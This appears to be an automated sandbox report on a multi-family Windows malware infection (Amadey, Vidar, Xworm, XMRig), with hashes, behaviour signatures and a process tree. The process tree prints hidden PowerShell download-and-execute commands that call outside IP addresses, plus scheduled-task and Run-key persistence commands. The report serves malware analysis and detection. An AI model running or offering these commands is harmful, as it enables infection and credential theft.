| SHA256 | 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221 |
| SHA512 | c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f |
memory/4072-747-0x0000000000AA0000-0x0000000000B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107810101\SvhQA35.exe
| MD5 | 9da08b49cdcc4a84b4a722d1006c2af8 |
| SHA1 | 7b5af0630b89bd2a19ae32aea30343330ca3a9eb |
| SHA256 | 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd |
| SHA512 | 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb |
memory/4012-864-0x000000001B890000-0x000000001BB72000-memory.dmp
memory/4012-865-0x0000000002770000-0x0000000002778000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe
| MD5 | f155a51c9042254e5e3d7734cd1c3ab0 |
| SHA1 | 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf |
| SHA256 | 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af |
| SHA512 | 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a |
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 23:06
Reported
2025-03-05 23:09
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
151s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
LiteHTTP
Litehttp family
Vidar
Vidar family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\iSoxSIyN\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107790101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2788 set thread context of 2116 | N/A | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe |
| PID 4044 set thread context of 2012 | N/A | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe |
| PID 3404 set thread context of 1436 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107780101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107820101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\10107800101\mAtJWNv.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe
"C:\Users\Admin\AppData\Local\Temp\06fb4f80cee614aa2a3e1d174c2bb34e6d70522d314b33246ec9e1d945e9639f.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn dC5qAma86c3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn dC5qAma86c3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mq8kQ9OnO.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'VAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE
"C:\Users\Admin\AppData\Local\TempVAWCPAZH0JQGCXXC1OSUNCDSCXKXL5SV.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe
"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\162.tmp\163.tmp\164.bat C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe
"C:\Users\Admin\AppData\Local\Temp\10107770101\v6Oqdnc.exe"
